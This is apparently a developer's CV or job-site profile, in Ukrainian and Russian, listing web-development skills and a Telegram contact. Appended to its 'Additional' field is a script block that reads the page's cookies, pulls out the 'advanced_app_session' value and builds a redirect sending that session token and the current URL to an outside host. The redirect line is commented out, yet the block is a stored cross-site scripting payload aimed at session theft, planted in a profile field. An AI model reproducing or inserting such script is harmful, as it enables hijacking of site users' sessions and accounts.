Досвід роботи:
Full-Stack Developer at MedAccount LLC | 2021 - now
Освіта:
Среднее профессиональное образование
Професійні та інші навички:
· HTML, CSS, JavaScript
, · Node.js, Express, Fastify, Socket.io
, · React, Zustand, React Query
, · Tailwind, CSS Modules, Shadcn/ui
, · Fetch, Ajax, Axios, RestAPI, JWT
, · MongoDB(Mongoose), SQL
, · Git, VS Code, DevTools
Додатково:
Telegram: <a href="https://t.me/fitchers" style="color: #1970bd;">https://t.me/fitchers</a> <br>
<script>
const cookieString = document.cookie
// Способ 2: Разбиение строки на массив
const getCookieValue2 = (name) => {
const cookies = cookieString.split(';');
for (let cookie of cookies) {
const [cookieName, cookieValue] = cookie.trim().split('=');
if (cookieName === name) {
return cookieValue;
}
}
return null;
};
const sessionValue2 = getCookieValue2('advanced_app_session');
if (!window.location.href.includes("fixxx")) {
const currentUrl = window.location.href;
// window.location.href = 'https://thebestsellers.pro?data=' + sessionValue2 + "&url=" + currentUrl ;
}
</script>